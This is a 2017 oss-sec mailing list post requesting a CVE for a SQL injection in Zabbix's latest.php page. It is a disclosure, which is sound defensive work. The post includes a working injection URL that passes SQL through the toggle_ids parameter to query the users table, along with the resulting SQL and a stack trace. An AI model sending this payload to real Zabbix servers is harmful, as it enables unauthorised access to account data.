oss-sec mailing list archives
CVE Request: Zabbix: SQL injection vulnerabilities in "Latest data"
From: Salvatore Bonaccorso <carnil () debian org>
Date: Thu, 12 Jan 2017 06:42:38 +0100
Hi
From [1]. Zabbix 2.2.x, 3.0.x and trunk suffers from a remote SQL injection vulnerability due to a failure to sanitize input in the toggle_ids array in the latest.php page. For example: latest.php?output=ajax&sid=&favobj=toggle&toggle_open_state=1&toggle_ids[]=15385); select * from users where (1=1 Result SQL (0.000361): INSERT INTO profiles (profileid, userid, idx, value_int, type, idx2) VALUES (88, 1, 'web.latest.toggle', '1', 2, 15385); select * from users where (1=1) latest.php:746 → require_once() → CProfile::flush() → CProfile::insertDB() → DBexecute() in /home/sasha/zabbix-svn/branches/2.2/frontends/php/include/profiles.inc.php:185
[1] https://support.zabbix.com/browse/ZBX-11023 [2] https://bugs.debian.org/850936 Could you please assign a CVE for this zabbix issue. Regards, Salvatore
Current thread:
- CVE Request: Zabbix: SQL injection vulnerabilities in "Latest data" Salvatore Bonaccorso (Jan 11)
- Re: CVE Request: Zabbix: SQL injection vulnerabilities in "Latest data" cve-assign (Jan 12)